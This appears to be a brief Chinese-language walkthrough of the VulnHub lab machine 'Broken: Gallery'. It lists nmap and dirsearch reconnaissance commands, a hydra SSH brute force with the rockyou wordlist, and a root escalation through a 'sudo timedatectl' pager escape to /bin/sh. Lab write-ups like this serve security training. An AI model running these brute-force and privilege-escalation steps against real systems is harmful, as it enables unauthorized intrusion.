靶机安装
下载地址:Broken: Gallery ~ VulnHub
信息收集
靶机IP发现
nmap 192.168.93.0/24
端口扫描
nmap -A 192.168.93.167 -p-
目录扫描
dirsearch -u http://192.168.93.167
页面访问,
没有可用的信息
尝试22端口的ssh进行爆破
hydra -L rockyou.txt -P rockyou.txt 192.168.93.167 ssh# 成功爆破出账号密码
broken | broken进行远程连接
ssh broken@192.168.93.167# 远程连接ssh,成功登录
提权
进行sudo -l
尝试timedatectl
sudo timedatectl list-timezones
!/bin/sh
![[upload]-[GXYCTF2019]BabyUpload1-笔记](https://i-blog.csdnimg.cn/direct/7fb53f7dc67a44a495ebff43d6488819.png)
